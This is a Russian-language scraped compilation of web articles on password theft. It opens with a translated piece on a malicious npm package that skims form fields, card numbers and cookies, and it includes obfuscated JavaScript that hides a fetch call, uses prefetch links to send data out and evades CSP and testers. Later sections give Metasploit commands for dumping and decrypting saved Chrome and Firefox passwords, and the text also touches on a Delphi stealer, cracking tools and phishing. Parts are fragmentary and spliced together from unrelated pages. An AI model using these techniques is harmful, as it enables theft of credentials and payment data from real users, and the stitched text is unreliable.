Скрипт для кражи паролей

Содержание
  1. Кража паролей: как наши учетные записи уводят через npm-пакет
  2. Рассмотрим один интересный способ, как кража паролей может быть успешно реализована
  3. Перевернем мир
  4. А может, ложку дегтя?
  5. Куда теперь бежать?
  6. Заключение
  7. Другие материалы по теме:
  8. Скрипт кражи паролей
  9. Взлом
  10. ВКонтакте» заблокировал 226 тысяч аккаунтов из-за кражи паролей
  11. — Советы по — защитe сайта от — вирусов, шеллов, троянов, дорвеев
  12. Кража паролей UCOZ или другого сайта с поддержкой PHP
  13. Обзор: Как защитить пароли от кражи: 5 простых советов — 15: 50 — Максим Мишенев
  14. Пишем стилер на Delphi программа котрая крадёт пароли на делфи
  15. Скрипт для кражи паролей из фаерфокса
  16. Форум игрового GTA SA-MP сервера RPG РОССИЯ «ImperiaL»
  17. Cкрипт вирусы
  18. Лучшие программы для взлома паролей
  19. Что такое взлом паролей?
  20. 1. John the Ripper
  21. 2. Aircrack-ng
  22. 3. RainbowCrack
  23. 4. THC Hydra
  24. 5. HashCat
  25. 6. Crowbar
  26. 7. coWPAtty
  27. Выводы
  28. Скрипт для кражи паролей
  29. Начинающему пользователю ПК
  30. Скрипт кражи паролей
  31. Как удаленно украсть и дешифровать пароли Chrome и Firefox
  32. Создание дампа паролей Google Chrome
  33. Создание дампа паролей Mozilla Firefox
  34. Как защититься от кражи паролей хакерами

Кража паролей: как наши учетные записи уводят через npm-пакет

Скрипт для кражи паролей

Кража паролей лишит вас доступа к своей странице или может оставить без кругленькой суммы – вот оно, счастье злоумышленника.

Рассмотрим один интересный способ, как кража паролей может быть успешно реализована

Заполучить пароль или номер кредитной карты можно многими способами. Далее речь пойдет о том, как это делается при помощи внедрения кода в npm-пакет.

Вредоносный код, который и выполняет всю грязную работу, занимается поиском на странице браузера чего-либо из представленного ниже:

  • любая форма для ввода;
  • элемент со свойством, в названии которого встречается «password», «cardnumber», «cvc», «checkout» и т. д.

Если после события submit искомая информация найдена, на этой страничке есть чем поживиться.

  • Из каждого поля формы извлекаем информацию: ( document.forms.forEach(…) );
  • собираем «печеньки»: document.cookie;
  • все это дело оборачивается всегда в рандомную строку: const payload = btoa(JSON.stringify(sensitiveUserData));
  • а после, отправляется на промежуточный хост: https://legit-analytics.com?q=${payload};
  • и в случае наличия полезностей – отправляется на сервер хакера.

Перевернем мир

Чтобы это счастье вышло в свет, нужно как-то заставить код попасть на потенциальные сайты-доноры. Можно пытаться пробиться через расширения браузеров, но это не так эффективно. Межсайтовый скриптинг – хороший вариант, но у него (у XSS) есть свои протоколы безопасности, и снова не те масштабы. Гораздо лучше подойдет npm.

Можно изобрести пакет, который будет на лету менять цвет консольного вывода в браузере.

Заставляем принять этот “полезный” апдейт в свои зависимости, при помощи пулл-реквеста для нескольких (любых) существующих пакетов в сети, и ждать.

Через месяц имеем 120000 скачиваний этого обновления и выполнение кода на более чем 1000 сайтов. Конечно же, это не панацея, и велика вероятность, что эфемерное обновление пакета не примут с распростертыми объятиями, но это безопасно, и есть шанс, что быстро не засекут.

А может, ложку дегтя?

Звучит все гладко и красиво, но есть некоторые вопросы, которые могут появиться у пытливого читателя, и их нужно развенчать.

Сетевые запросы от скрипта – код почти ничего не отправляет, т. е. постоянного обмена трафиком нет.

Отсылка собранного материала происходит с 19:00 до 7:00, когда безопасники и прочие тестеры уже ничего не тестируют.

Даже если тестировщик и захочет отличиться, код подменяет URL на “левый”, схожий с социальными сетями, и отправка происходит всегда в разное время: вот такой эффект неожиданности.

Поиск “странностей” в npm. Удачи! Временные и ресурсные затраты несопоставимы, ну а если и найдется что-то, то в коде нет и намека на fetch, XMLHttpRequest или адрес хоста, на который все отправляется.

const i = 'gfudi'; const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() – 1)).join(''); self[k(i)](urlWithYourPreciousData);

const i = 'gfudi';const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() – 1)).join('');self[k(i)](urlWithYourPreciousData);

«gfudi» – это fetch, но с переставленными буквами на одну, а self – это алиас window. Не используется ничего обычного, как fetch. Вместо этого, везде где можно, нужно применять EventSource(urlВашихЛюбимыхДанных). Даже если трафик буду слушать по serviceWorker-у, никто ничего не заподозрит т. к. ничего не отправляется в браузерах, которые поддерживают serviceWorker.

Использование CSP в качестве защиты. С точки зрения CSP наш код ничего запрещенного не делает, кроме отправки данных на какой-то домен. Да, CSP неплохо справляется с XSS-атаками и может ограничивать общение браузера с внешним миром, но действия скрипта не настолько масштабны, чтобы можно было что-то проанализировать.

const linkEl = document.createElement('link'); linkEl.rel = 'prefetch'; linkEl.href = urlWithYourPreciousData; document.head.appendChild(linkEl);

const linkEl = document.createElement('link');linkEl.rel = 'prefetch';linkEl.href = urlWithYourPreciousData;document.head.appendChild(linkEl);

Чтобы не поплатиться за взлом, нужно проверять CSP на наличие функционирующей системы блокировки (connect-src) и инструмент-перехватчик (default-src). Сделать это можно так:

fetch(document.location.href) .then(resp => { const csp = resp.headers.get('Content-Security-Policy'); // Смотрим, как работает CSP });

fetch(document.location.href).then(resp => {const csp = resp.headers.get('Content-Security-Policy');// Смотрим, как работает CSP });

Проверять нужно в первый раз, чтобы пользователь, и прочие надзиратели ничего не заподозрили.

Куда теперь бежать?

Теперь подумаем от лица пользователя или разработчика: “Все плохо, наши пароли уже в даркнэте!”. Чтобы попытаться избежать провала, нельзя использовать npm на страницах с формами, и прочими собирающими компонентами.

Нельзя использовать стороннюю рекламу, Google Tag Manager, скрипты с диаграммами, аналитику – никакого постороннего кода быть не должно, иначе можно получить инъекцию.

Это касается только страниц, где пользователь что-то вводит, остальная же часть сайта может спокойно работать на React-е и не беспокоиться.

Вам нужна отдельная страница, которая не имеет ничего лишнего и уже в ней собирать номера кредиток, пароли и учетные данные в iFrame.

Кража паролей осуществляется и при помощи фишинга (подделывание настоящего сайта инфицированной копией). Если хакер сможет завладеть вашим почтовым ящиком, то плакали все регистрации и банковские счета, которые были привязаны к этой почте. За 2017 год было взломано 12 млн. учетных записей.

Вполне успешным является и кейлогерство – 1 млн. пользователей пострадал, именно из-за этого вредоноса.

Заключение

Статья о том, что никому нельзя доверять, и оставлять сайт с известными уязвимостями строго запрещено, т. к. в мире огромное количество желающих полакомиться чем-то ценным. Любой сайт уязвим, и список этих брешей постоянно меняется: не забывайте держать руку на пульсе.

Перевод на русский осуществлен Библиотекой Программиста.

Оригинал статьи

Другие материалы по теме:

Источник: https://proglib.io/p/steal-password/

Скрипт кражи паролей

Скрипт для кражи паролей

Скрипт вирусы — большое семейство вредоносных программ «прописывающихся» в уязвимом месте программы и заставляя «движок» программы совершать несвойственные ей действия. Написанны на языках Visual Basic, Basic Script, Java Script, Jscript.

Использование микропрограмм (скриптов, Java-апплетов и т.д.) не является криминалом. Чат, ание, счетчики всем этим удобствам на наших страничках мы обязаны именно скриптам (см.

Взлом

Cуществует большое количество вирусов, которые воруют пароли, как из компьютера, так и из браузера. Многие пользователи сами отдают злоумышленникам свои логины и пароли, вводя их на сторонних сайтах.

При взломе аккаунта обычно используют примитивный перебор паролей. В таком случае, придумав себе сложный пароль, вы частично обезопасите свой контакт.

Некоторые сайты при взломе контакта используют уже имеющуюся базу логинов и паролей, предварительно ими собранную.

ВКонтакте» заблокировал 226 тысяч аккаунтов из-за кражи паролей

Администрация социальной сети «ВКонтакте » заморозила 226 тыс. аккаунтов, которые были зарегистрированы на взломанные электронные ящики «Яндекса », Mail.ru и Gmail, написал в своем твиттере пресс-секретарь социальной сети Георгий Лобушкин.

Как уточняется в сообщении, к сервису Яндекс.Почта были привязаны аккаунты 31 тыс. пользователей социальной сети, к почтовому сервису Gmail — 10 тыс.

— Советы по — защитe сайта от — вирусов, шеллов, троянов, дорвеев

Независимо от того, насколько популярен ваш сайт, на нем рано или поздно могут появиться вирусы, хакерские скрипты (шеллы, дамперы, бэкдоры) и другие вредоносные скрипты.

Источников проникновения может быть несколько:

К сожалению, нет гарантированного способа обезопасить свой сайт от внешнего вторжения на сто процентов, поскольку в каждом, даже самом регулярно обновляемом программном обеспечении скорее всего найдутся ошибки и уязвимости.

Кража паролей UCOZ или другого сайта с поддержкой PHP

Сегодня я хочу рассказать про одну очень известную «Дырку» сайтов с поддержкой PHP. К примеру это может быть сайт созданный на Ucoz. Через этот ресурс можно быстро и просто создать простенький блог или форум своими руками.

Казалось бы какая великолепная вещь? 250 Гигабайт — бесплатно! Но не стоит так радоваться. Дело в том, что в системе UCOZ свои уязвимости.

Если над ресурсом, у которого есть поддержка PHP, вебмастера мало работали с защитой или не работали вообще, то можно спокойно красть пароли вот с тахик вот сайтов.

Обзор: Как защитить пароли от кражи: 5 простых советов — 15: 50 — Максим Мишенев

Пароль – это, зачастую, единственное, что защищает нашу информацию от загребущих рук третьих лиц.

О шифровании данных знает минимальное количество людей, и еще меньше среди них тех, кто активно применяет соответствующие технологии и алгоритмы.

Если уж говорить начистоту, то современные пользователи довольно халатно относятся к вопросам информационной безопасности. в результате чего их почтовые адреса, аккаунты в социальных сетях и тому подобное постоянно подвергаются взлому.

Недавнее исследование показало, что в Европе, где живут вполне продвинутые люди, только 24% населения используют разные пароли для различных сайтов.

Пишем стилер на Delphi программа котрая крадёт пароли на делфи

И снова здравствуйте! Вот я решил написать свою новую статью о краже паролей. Да, я понимаю что дело плохое, и не надо это делать, ведь это «уголовная статья: 272». Но статья подождёт, мы же не Пентагон будем взламывать 0_о? Наверное.

Вирус у нас будет красть пароли от самых известных программ: Opera, FireFox, Internet Explorer, FileZilla, Total Comannder и т.д. я не буду писать весь список.

Им я объяснил что это я написал ради интереса, но этот интерес дошёл до предела! Уже через день пришло +28 новых писем, и это только «», а что творилось в «Одноклассниках»! Оооо.

Теперь перейдём к самому главному, краже паролей.

Скрипт для кражи паролей из фаерфокса

shareware и пробные утилиты для восстановления паролей. Как вы проверите свою почту и щёлкните по ссылке для подтверждения, Да, Программы для взлома скачать бесплатно. Download Master, производительности для этой цели все же недостаточно. Насчет кражи пароля своего аакаунта — В Firefox ссылки, картинка некрасиво растягивается, конвертирует из GET .

Тоннели, st.ru для кражи паролей Скрипт st.ru для кражи.

Итак, в этой статье я расскажу, как можно получить пароль и всякую интересную информацию при помощи сайта. Всё что нужно «хацкеру» — это просто иметь в сети свою страничку, на которую вы либо придёте сами, либо вас туда заманят.

Скитаясь по сети, я всё чаще и чаще слышу плохие отзывы о социнжинерии.

Если вас не интересуют способы взлома с применением социнжинерии или для вас это всё детский лепет, то нажмите в верхнем углу вашего браузера крестик и забудьте о существовании этой статьи.

Форум игрового GTA SA-MP сервера RPG РОССИЯ «ImperiaL»

Данные стиллеры не могут быть найдены АНТИВИРУСАМИ . (https://www.virustotal.com/ ) — т.к. они не являются вирусами или даже вредоносными программами для ОС вашего компа.

В общем, хочу вас предупредить, если вы используете любые клео, то вы это делаете на свой страх и риск — я не гарантирую 100% сохранность вашего аккаунта при использовании вами клео-скриптов.

Источник: http://megatranslation.ru/skript-krazhi-parolej-57071/

Cкрипт вирусы

Скрипт вирусы — большое семейство вредоносных программ «прописывающихся» в уязвимом месте программы и заставляя «движок» программы совершать несвойственные ей действия.

Написанны на языках Visual Basic, Basic Script, Java Script, Jscript. Использование микропрограмм (скриптов, Java-апплетов и т.д.) не является криминалом.

Чат, ание, счетчики всем этим удобствам на наших страничках мы обязаны именно скриптам (см.

картинку)

Лучшие программы для взлома паролей

Скрипт для кражи паролей

Недавно мы опубликовали статью о надежности паролей, а также паролях, которые используются многими пользователями. Большинство людей используют слабые пароли. Но как убедится, что ваш пароль сильный? Взлом паролей – это неотъемлемая часть цифровой криминалистики и тестирования информационной безопасности.

В этой статье мы собрали лучшие программы для взлома паролей, которые могут использоваться системными администраторами для проверки надежности их паролей. Все утилиты используют различные алгоритмы и применимы к различным ситуациям. Рассмотрим сначала базовую информацию, которая поможет вам понять с чем мы будем иметь дело.

Что такое взлом паролей?

В области кибербезопасности и криптографии взлом паролей играет очень важную роль. Это процесс восстановления пароля с целью нарушения или восстановления безопасности компьютера или системы.

Итак, почему вам нужно узнать программы перебора паролей? В мирных целях можно использовать взлом паролей для восстановления забытых паролей от онлайн аккаунтов, также это используется системными администраторами для профилактики на регулярной основе.

Для взлома паролей в большинстве случаев используется перебор. Программное обеспечение генерирует различные варианты паролей и сообщает если был найден правильный. В некоторых случаях персональный компьютер способен выдавать миллионы вариантов в секунду. Программа для взлома пароля на пк проверяет все варианты и находит реальный пароль.

Время, необходимое для взлома пароля пропорционально длине и сложности этого пароля. Поэтому рекомендуется использовать сложные пароли, которые трудно угадать или подобрать. Также скорость перебора зависит от криптографической функции, которая применяется для генерации хэшей пароля. Поэтому для шифрования пароля лучше использовать Bcrypt, а не MD5 или SHA.

Вот основные способы перебора пароля, которые используются злоумышленниками:

  • Атака по словарю – для атаки используется файл, который содержит список слов. Программа проверяет каждое из слов, чтобы найти результат;
  • Атака Bruteforce – можно не использовать словарь, а перебирать все комбинации заданных символов;
  • Атака с помощью радужных таблиц – в атаке используются предварительно вычисленные хэши, поэтому она быстрее.

Есть и другие методы взлома паролей, основанные на социальной инженерии, но сегодня мы остановимся только на атаках без участия пользователя.

Чтобы защититься от таких атак нужно использовать только сложные пароли. А теперь рассмотрим лучшие инструменты для взлома паролей 2017.

Этот список опубликован только для ознакомительных целей и мы ни в коем случае не призываем взламывать чужие личные данные.

1. John the Ripper

John the Ripper – это один из самых популярный инструментов для перебора паролей, доступных абсолютно всем. Он распространяется с открытым исходным кодом и написан на языке программирования Си. Здесь собраны различные методы перебора паролей.

Программа способна перебирать пароли по сохраненному хэшу, и поддерживает различные алгоритмы хэширования, в том числе есть автоматическое определение алгоритма. John the Ripper относиться к набору инструментов для тестирования безопасности от Rapid7. Кроме Linux поддерживается Windows и MacOS.

2. Aircrack-ng

Aircrack-ng – это набор программ для взлома и перехвата паролей от wifi сетей. Программа – одна из лучших, которые используются хакерами. Здесь есть все необходимое для взлома WEP и WPA шифрования, начиная от перехвата хэша, и до получения готового пароля.

Особенно легко поддается взлому шифрование WEP, для преодоления защиты существуют атаки PMS и PTW, с помощью которых можно взломать этот протокол в считаные минуты при достаточном потоке трафика через сеть. Поэтому всегда используйте WPA2 чтобы быть в безопасности. Тоже поддерживаются все три платформы: Linux, Windows, MacOS.

3. RainbowCrack

Как следует из названия, RainbowCrack использует радужные таблицы для взлома хэшей паролей. С помощью уже готовых таблиц утилита очень сильно уменьшает время взлома. Кроме того, есть как графический интерфейс, так и утилиты командной строки.

После завершения этапа предварительных вычислений этот инструмент работает в сотни раз быстрее чем при обычном переборе. Вам не нужно самим создавать таблицы, разработчики уже создали их для LM, NTLM, MD5 и SHA1. Все доступно бесплатно.

Еще один важный момент – это ускорение с помощью GPU. С помощью использования видеокарты вы можете снизить время вычисление пароля еще на несколько порядков. Поддерживаются платформы Windows и Linux.

4. THC Hydra

В отличие от выше перечисленных программ, Hydra работает по-другому. Она не вычисляет хэши. Вместо этого, программа выполняет атаки перебора на различные сетевые протоколы. Здесь поддерживаются Astrisk, FTP, HTTP, MySQL, XMPP, Telnet, SHH и многие другие. Основная цель утилиты – атаки перебора на форму ввода пароля.

Этот инструмент помогает исследователям безопасности узнать насколько легко можно получить доступ к удаленной системе. Для расширения функций можно добавлять модули, поддерживается Linux, Windows, Solaris, FreeBSD и MacOS.

5. HashCat

По заявлениям разработчиков – это самый быстрый инструмент для перебора паролей. Он распространяется в качестве свободного программного обеспечения и поддерживает такие алгоритмы: md4, md5, LM, SHA, MySQL, Cisco PIX и Unix Crypt.

Есть версии инструмента для перебора на CPU, а также взлома на основе GPU – oclHashcat и cudaHashcat. Кроме стандартной атаки Bruteforce, поддерживаются атаки по словарю, гибридные атаки по самые, по таблицам, Prince и так далее. Из платформ поддерживаются Windows, Linux и MacOS.

6. Crowbar

Crowbar – это популярный инструмент для тестирования безопасности паролей. Другие программы перебора паролей используют логины и пароли пользователей, но crowbar позволяет перебирать ключи SSH.

Этот инструмент с открытым исходным кодом создан для работы с протоколами, которые редко поддерживаются другими программами. Сейчас поддерживается VNC, OpenVPN, SSP, NLA. Программа может работать на Linux, Windows и MacOS.

7. coWPAtty

Это реализация утилиты для перебора пароля от WPA/WPA2 PSK на основе словаря или радужных таблиц. Использование радужных таблиц очень сильно ускоряет работу утилиты. Стандарт PSK используется сейчас очень часто. Радует только то, что перебрать пароль очень сложно, если он был изначально выбран правильным.

Выводы

В этой статье мы рассмотрели лучше программы для взлома паролей 2017, которые могут использоваться как злоумышленниками, так и системными администраторами для проверки надежности паролей пользователей. Обязательно устанавливайте сложные пароли для своих устройств и аккаунтов, а также если вы системный администратор, следите за  безопасностью паролей пользователей вашей компании.

(15 4,80 из 5)
Загрузка…

Источник: https://losst.ru/luchshie-programmy-dlya-vzloma-parolej

Скрипт для кражи паролей

Скрипт для кражи паролей

Тем или иным способом вас заманивают на этот поддельный сайт, и вы вводите там свой пароль. Вам, например, может прийти письмо, которое выглядит в точности как уведомление от ВКонтакте.ру о поступлении к вашей фотографии.

Но ссылка на в письме будет выглядеть примерно так: http://ontakte.ru/блаблабла. Обратите внимание, что эта ссылка ведет вовсе не туда, куда вы думаете, а на google.com. Итак, вы заходите на поддельный сайт со схожим адресом, вводите свой пароль.

Вас перенаправляют на настоящий сайт, а пароль остается у злоумышленника.

Начинающему пользователю ПК

Предлагаю немного поковырять подобные программы. Как уже было сказано выше, в сети этого хлама очень много. При удачи можно разоблачить логово ХАКЕРА , и получить доступ ко всей информации которую он уже успел украсть и если постараться можно уничтожить её, тем самым мы спасём многие жизни пользователей в контакте.

Скрипт кражи паролей

Пароль – это, зачастую, единственное, что защищает нашу информацию от загребущих рук третьих лиц.

О шифровании данных знает минимальное количество людей, и еще меньше среди них тех, кто активно применяет соответствующие технологии и алгоритмы.

Если уж говорить начистоту, то современные пользователи довольно халатно относятся к вопросам информационной безопасности. в результате чего их почтовые адреса, аккаунты в социальных сетях и тому подобное постоянно подвергаются взлому.

Например, это можно сделать по измерению пиковых амплитуд сигнала и с использованием дополнительных сенсоров, как показано в предыдущих научных работах. Код для ввода данных опубликован на GitHub.

В базе данных накапливается информация о нажатиях и показаниях сенсоров в момент нажатия. Судя по результатам сравнительных тестов, PINlogger.

К тому же это первая система для кражи ПИН-кодов через браузер, а не через приложение, установленное в смартфоне.

Рекомендуем прочесть:  Какие документы нужны для развода если есть ребенок

Как удаленно украсть и дешифровать пароли Chrome и Firefox

Скрипт для кражи паролей

Пароли, хранящиеся в веб-браузерах, таких как Google Chrome и Mozilla Firefox — это просто золотая жила для хакеров.

Злоумышленник, у которого есть бэкдор-доступ к взломанному компьютеру может легко сделать дамп паролей, а затем расшифровать все данные, хранящиеся в веб-браузерах.

После прочтения этой статьи вы дважды подумаете, прежде чем кликнуть на «Сохранить», когда вам предложат сохранить новый пароль.

С помощью бэкдора, установленного на целевом компьютере, хакеры могут осуществлять различные скрытые атаки. Они могут перехватывать любое нажатие вами клавиш, делать скриншоты экрана, записывать звук через микрофон. В этой статье мы сосредоточимся на том, как хакеры могут получить ваши пароли, которые хранятся в веб-браузерах.

После того, как хакер установит свою полезную нагрузку и начнет эксплуатацию уязвимостей системы (в нашем случае это Windows 10), он сможет начать атаку, направленную на изъятие паролей из Google Chrome и Mozilla Firefox, которые оцениваются как лучшие и самые популярные веб-браузеры. Количество пользователей Microsoft Edge составляет около 4%, поэтому работа с этим браузером не стоит затраченного времени.

Создание дампа паролей Google Chrome

Для шифрования паролей, хранящихся на компьютерах, с рандомно сгенерированным ключом, Chrome использует функцию Windows, которая называется CryptProtectData.

Только пользователь с теми же учетными данными, что и у пользователя, который зашифровал эти данные, сможет впоследствии расшифровать эти пароли.

Каждый пароль зашифровывается другим случайным ключом и хранится в небольшой базе данных на компьютере. База данных находится вот в этой директории:

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

Далее мы будем использовать модуль Metasploit, предназначенный специально для дампа паролей, хранящихся в браузере Chrome. Чтобы сделать дамп сохраненных паролей Chrome на целевом устройстве, нужно воспользоваться модулем enum_chrome, введя в консоль команду ниже. Этот модуль начнет собирать пользовательские данные из Google Chrome, а затем пытаться их дешифровать.

run post/windows/gather/enum_chrome

Расшифрованные пароли Chrome будут автоматически сохранены в директории /root/.msf4/loot/. Имя .txt-файла, содержащего расшифрованные пароли, будет содержать в себе текущую дату и IP-адрес целевого компьютера.

Читать также:  Как взламывать пароли. Часть 5: создание вордлистов с CeWL

Чтобы просмотреть пароли Chrome в файле .txt, сначала воспользуйтесь командой background для того, чтобы отправить meterpreter в фоновый режим, а затем используйте команду cat, как показано на скриншоте ниже. Обязательно поменяйте имя файла на то, которое есть у вас. В столбце «Decrypted Data» будут отображены дешифрованные пароли, найденные в браузере.

background cat /root/.msf4/loot/2018…_default_…_chrome.decrypted_xxxxx.txt

Создание дампа паролей Mozilla Firefox

Встроенный менеджер паролей Firefox хранит зашифрованные учетные данные в файле с именем «logins.json». Имена пользователей и пароли, хранящиеся в файле logins.json, зашифровываются ключом, который, в свою очередь, хранится в файле «key4.db».

Оба файла logins.json и key4.db могут находиться в директории Windows, указанной ниже.

8-символьный randomString автоматически присваивается директории Firefox, когда он впервые запускается на компьютере и эти случайные строки (randomString) отличаются для каждой установки.

%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

Чтобы сделать дамп сохраненных паролей Firefox на скомпрометированном компьютере, используйте модуль firefox_creds.

run post/multi/gather/firefox_creds

Точно также воспользуйтесь командой background, чтобы временно перевести сеанс meterpreter в фоновый режим, затем с помощью команды cd перейдите в директорию loot, куда сохраняются сохраненные файлы. При помощи команды mkdir создайте новую директорию с названием «Profiles».

Если посмотрите внимательно на сохраненные данные, то вы заметите, что все эти файлы автоматически сохраняются с расширением .bin.

Эти файлы необходимо вручную переместить и переименовать в соответствии с их оригинальными именами, выделенными в левой части скриншота. Например, файл «cert_501854.

bin» необходимо перенести в каталог Profiles и переименовать в «cert9.db». Команда mv поможет вам в этом деле.

mv certfilehere.bin Profiles/cert9.db

Это нужно сделать со всеми сохраненными в директории loot файлами.

Чтобы дешифровать пароли, хранящиеся в файле logins.json, клонируйте репозиторий firefox_decrypt с GitHub. Для этого воспользуйтесь следующей командой:

git clone https://github.com/Unode/firefox_decrypt.git

Команду, приведенную ниже, нужно использовать для дешифрования паролей Firefox, хранящихся в файле logins.json. Скрипт запросит «Мастер-пароль», но это можно обойти, если оставить поле пустым и нажать Enter.

python firefox_decrypt/firefox_decrypt.py /root/.msf4/loot/

Как защититься от кражи паролей хакерами

Хранение конфиденциальных данных в менеджере паролей браузеров — очень плохая идея. К сожалению, мы не так уж и много можем сделать для того, чтобы предотвратить такие атаки:

Читать также:  Основы Linux. Часть 17 (DNS-клиент)

не сохранять учетные данные в вашем браузере
удалить те, которые там уже сохранены

Вы можете использовать менеджер паролей, такой как LastPass, но если хакер эксплуатировал вашу систему с бэкдором, то он также мог использовать клавиатурный сниффер (кейлоггер), чтобы получить ваш мастер-пароль, который — ключ ко всему. Даже если вы не храните ваши пароли на вашем компьютере, кейлоггер наверняка перехватит их, когда вы будете вводить их вручную на том сайте, который посещаете.

Простое воздержание от хранения большого количества данных в одном небезопасном месте может помочь уменьшить масштаб ущерба, причиняемого злоумышленником, но нет никакой возможности хранить ваши пароли по-настоящему в безопасности, пока вы не будете препятствовать хакерам устанавливать бэкдор на вашем компьютере.

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.

Источник: https://helpugroup.ru/kak-udalenno-ukrast-i-deshifrovat-paroli-chrome-i-firefox/

Podyacheva-notar
Добавить комментарий